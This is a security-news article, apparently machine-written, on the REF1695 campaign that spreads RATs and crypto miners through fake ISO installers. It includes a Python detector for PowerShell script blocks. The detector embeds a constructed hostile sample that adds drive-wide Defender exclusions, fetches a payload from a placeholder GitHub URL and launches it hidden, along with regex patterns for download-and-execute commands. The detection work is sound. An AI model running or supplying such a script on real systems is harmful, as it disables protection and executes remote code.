

Ethical Hacking News

RATs, Crypto Miners, and ISO Lures: A Sophisticated Threat Actor Exploits Vulnerabilities to Spread Malware



A new threat actor known as REF1695 has been using fake installers to deploy remote access trojans (RATs) and cryptocurrency miners, exploiting vulnerabilities in Windows operating systems. The malicious operation was recently identified by Elastic Security Labs researchers and has significant implications for organizations and individuals who rely on Windows. To mitigate these risks, it is essential to implement robust security measures, including regular updates, patching of vulnerable software, and the use of reputable antivirus software.

  • The REF1695 threat actor has been using fake installers to deploy remote access trojans (RATs) and cryptocurrency miners since November 2023.
  • The threat actor leverages the Windows operating system's ISO file format to spread its malware, evading detection and exploiting vulnerabilities.
  • The fake installers mimic legitimate software applications, making it difficult for users to distinguish between genuine and malicious software.
  • The threat actor uses PowerShell to bypass Microsoft Defender SmartScreen protections and launch malware in the background.
  • The attack has yielded $9,392 across four tracked wallets, indicating consistent financial returns to the attacker.
  • The REF1695 threat actor also abuses GitHub as a payload delivery CDN, hosting staged binaries across two identified accounts.
  • Implementing robust security measures, including regular updates and reputable antivirus software, is essential to mitigate these risks.



Researchers have uncovered a sophisticated threat actor known as REF1695 that has been using fake installers to deploy remote access trojans (RATs) and cryptocurrency miners since November 2023. The malicious operation, which leverages the Windows operating system's ISO file format to spread its malware, was recently identified by Elastic Security Labs researchers Jia Yu Chan, Cyril François, and Remco Sprooten.

According to the researchers, the threat actor has been using various techniques to evade detection and exploit vulnerabilities in the Windows operating system. One of the most notable methods is the abuse of legitimate software installers as a means of distributing its malware. The fake installers are designed to mimic those of legitimate software applications, making it difficult for users to distinguish between genuine and malicious software.

The threat actor also utilizes PowerShell, a powerful scripting language used by Windows administrators to automate tasks and manage system settings, to bypass Microsoft Defender SmartScreen protections against running unrecognized applications. By using an ISO file as the infection vector, the malware can invoke PowerShell, which is responsible for configuring broad Microsoft Defender Antivirus exclusions, thereby allowing the loader to launch in the background.

Furthermore, the threat actor has been observed leveraging similar tactics to deploy PureRAT, PureMiner, and a bespoke .NET-based XMRig loader. This loader reaches out to a hard-coded URL to extract the mining configuration and launch the miner payload, and the miner fine-tunes the CPU for mining operations using the "Winring0x64.sys" driver.

Another notable component of the attack is a watchdog process that ensures the malicious artifacts and persistence mechanisms are restored in the event they are deleted. The campaign is estimated to have accrued $9,392 across four tracked wallets, indicating that the operation is yielding consistent financial returns to the attacker.

The threat actor also abuses GitHub as a payload delivery CDN, hosting staged binaries across two identified accounts. This technique shifts the download-and-execute step away from operator-controlled infrastructure to a trusted platform, reducing detection friction.
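As an added defender-side example (this is not code from Elastic Security Labs or from this article), the checker below scores PowerShell script-block text for the combination the preceding paragraphs describe: broad Microsoft Defender exclusions, a payload fetched from GitHub-hosted infrastructure, and a download followed by a hidden background launch. The sample script blocks, the placeholder GitHub account and repository names, the rule names and the weights are all constructed for this example; it assumes the script text has already been collected, for instance from PowerShell script block logging, and it makes no claim about the actual scripts used by REF1695.

```python
"""Score PowerShell script-block text for the exclusion-then-loader pattern.

Added example, not code from Elastic Security Labs or from the article. The
regexes, rule names, weights and sample blocks below are constructed for
illustration; real input would come from PowerShell script block logging.
"""
import re
from dataclasses import dataclass, field

I = re.IGNORECASE

# One Add-/Set-MpPreference invocation and its arguments up to the next separator.
EXCLUSION_CMD = re.compile(r"\b(?:Add|Set)-MpPreference\b(?P<args>[^;\n|]*)", I)
# One -Exclusion* parameter and its comma-separated value list (quoted or bare).
_TOKEN = r'''"[^"]*"|'[^']*'|[^\s,]+'''
EXCLUSION_PARAM = re.compile(
    rf"-(?P<kind>ExclusionPath|ExclusionExtension|ExclusionProcess)\s+"
    rf"(?P<vals>(?:{_TOKEN})(?:\s*,\s*(?:{_TOKEN}))*)", I)
VALUE = re.compile(r'''"([^"]*)"|'([^']*)'|([^\s,]+)''')

# Exclusions that blanket a whole drive, a whole user profile or a temp area.
DRIVE_ROOT = re.compile(r"^[a-z]:\\?$", I)
PROFILE_ROOT = re.compile(
    r"^(?:[a-z]:\\users\\[^\\]+\\?"
    r"|\$env:(?:userprofile|appdata|localappdata|temp|tmp)"
    r"|%(?:userprofile|appdata|localappdata|temp|tmp)%)$", I)
EXEC_EXTS = {"exe", "dll", "ps1", "bat", "cmd", "js", "vbs", "scr", "msi"}

DOWNLOAD = re.compile(
    r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|Start-BitsTransfer|curl|wget)\b"
    r"|\.Download(?:File|String|Data)\(", I)
EXECUTE = re.compile(r"\b(?:Start-Process|Invoke-Expression|iex)\b", I)
HIDDEN = re.compile(r"-WindowStyle\s+Hidden\b", I)
GITHUB_HOST = re.compile(
    r"https?://(?:raw\.githubusercontent\.com|github\.com|objects\.githubusercontent\.com)/", I)
DISABLE_RTM = re.compile(r"-DisableRealtimeMonitoring\s+(?:\$true|1)\b", I)


@dataclass
class Finding:
    rule: str
    evidence: str
    weight: int


@dataclass
class Assessment:
    findings: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return sum(f.weight for f in self.findings)

    @property
    def rules(self) -> list:
        return sorted({f.rule for f in self.findings})

    @property
    def suspicious(self) -> bool:
        # A single drive-root or profile-wide exclusion is enough to alert on.
        return self.score >= 4


def is_broad_path(path: str) -> bool:
    """True when an exclusion path covers a whole drive, user profile or temp area."""
    p = path.strip()
    return bool(DRIVE_ROOT.match(p) or PROFILE_ROOT.match(p))


def analyze(script: str) -> Assessment:
    a = Assessment()
    for cmd in EXCLUSION_CMD.finditer(script):
        for param in EXCLUSION_PARAM.finditer(cmd.group("args")):
            kind = param.group("kind").lower()
            for v in VALUE.finditer(param.group("vals")):
                val = next(g for g in v.groups() if g is not None).strip()
                if kind == "exclusionpath" and is_broad_path(val):
                    a.findings.append(Finding("broad_exclusion_path", val, 4))
                elif kind == "exclusionextension" and val.lower().lstrip(".") in EXEC_EXTS:
                    a.findings.append(Finding("executable_extension_excluded", val, 3))
                elif kind == "exclusionprocess":
                    a.findings.append(Finding("process_exclusion", val, 2))
    if DISABLE_RTM.search(script):
        a.findings.append(Finding("realtime_monitoring_disabled", "DisableRealtimeMonitoring", 4))
    # A download on its own is routine admin activity; download followed by
    # execution is the loader behaviour, so only the combination scores.
    if DOWNLOAD.search(script) and EXECUTE.search(script):
        a.findings.append(Finding("download_then_execute", EXECUTE.search(script).group(0), 3))
    gh = GITHUB_HOST.search(script)
    if gh:
        a.findings.append(Finding("github_hosted_payload", gh.group(0), 2))
    if HIDDEN.search(script):
        a.findings.append(Finding("hidden_window", "-WindowStyle Hidden", 1))
    return a


# Constructed sample script blocks, not captured telemetry; the GitHub account
# and repository names are placeholders.
MALICIOUS_SAMPLE = r"""
Add-MpPreference -ExclusionPath 'C:\', "$env:USERPROFILE" -ExclusionExtension '.exe'
$u = 'https://raw.githubusercontent.com/PLACEHOLDER-ACCOUNT/PLACEHOLDER-REPO/main/stage2.bin'
Invoke-WebRequest -Uri $u -OutFile "$env:TEMP\upd.exe"
Start-Process -FilePath "$env:TEMP\upd.exe" -WindowStyle Hidden
"""
BENIGN_SAMPLE = r"""
Add-MpPreference -ExclusionPath 'C:\Program Files\ExampleVendor\BuildCache'
Invoke-WebRequest -Uri 'https://intranet.example/health' -UseBasicParsing
"""

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        result = analyze(sample)
        print(f"{label}: score={result.score} suspicious={result.suspicious}")
        for f in result.findings:
            print(f"  {f.rule:32} {f.evidence}")
```

The scoring deliberately treats a single drive-root or profile-wide exclusion as alert-worthy on its own, while a download or a Defender exclusion of one narrow vendor directory scores nothing; the benign sample exercises exactly that distinction. Thresholds and weights are tuning knobs, not measured values.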

Beyond its use of PowerShell and GitHub, the REF1695 threat actor has been observed in many cryptojacking campaigns over the years, exploiting vulnerabilities in legitimate software drivers. This driver-abuse functionality was added to XMRig miners in December 2019.

The attack has significant implications for organizations and individuals who rely on Windows operating systems and are susceptible to phishing attacks. To mitigate these risks, it is essential to implement robust security measures, including regular updates, patching of vulnerable software, and the use of reputable antivirus software. Individuals should also be cautious when downloading software from untrusted sources or clicking on suspicious links.

In conclusion, the REF1695 threat actor represents a sophisticated example of malware deployment using fake installers and exploitation of vulnerabilities in Windows operating systems. Its tactics and techniques highlight the importance of staying informed about emerging threats and implementing robust security measures to protect against such attacks.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/RATs-Crypto-Miners-and-ISO-Lures-A-Sophisticated-Threat-Actor-Exploits-Vulnerabilities-to-Spread-Malware-ehn.shtml

  • https://thehackernews.com/2026/04/researchers-uncover-mining-operation.html

  • https://malwaretips.com/threads/researchers-uncover-mining-operation-using-iso-lures-to-spread-rats-and-crypto-miners.140686/


  • Published: Thu Apr 2 08:25:52 2026 by llama3.2 3B Q4_K_M













    © Ethical Hacking News. All rights reserved.
